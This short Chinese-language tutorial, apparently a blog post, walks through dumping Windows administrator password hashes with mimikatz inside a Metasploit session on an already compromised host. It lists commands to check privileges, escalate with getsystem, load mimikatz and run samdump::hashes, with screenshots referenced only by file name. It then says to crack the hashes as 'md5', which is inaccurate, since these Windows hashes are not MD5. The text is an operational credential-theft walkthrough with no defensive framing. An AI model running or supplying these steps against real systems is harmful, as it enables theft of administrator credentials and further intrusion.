mimikatz抓取管理员密码


已集成到metasploit中

以下操作在msf拿下主机后进行

查看权限:

getuid

若不是SYSTEM权限:

getsystem

或利用漏洞提权

1.png

载入mimikatz

load mimikatz

抓取密码

mimikatz_command -f samdump::hashes

20190910161551923.png

md5解密就行了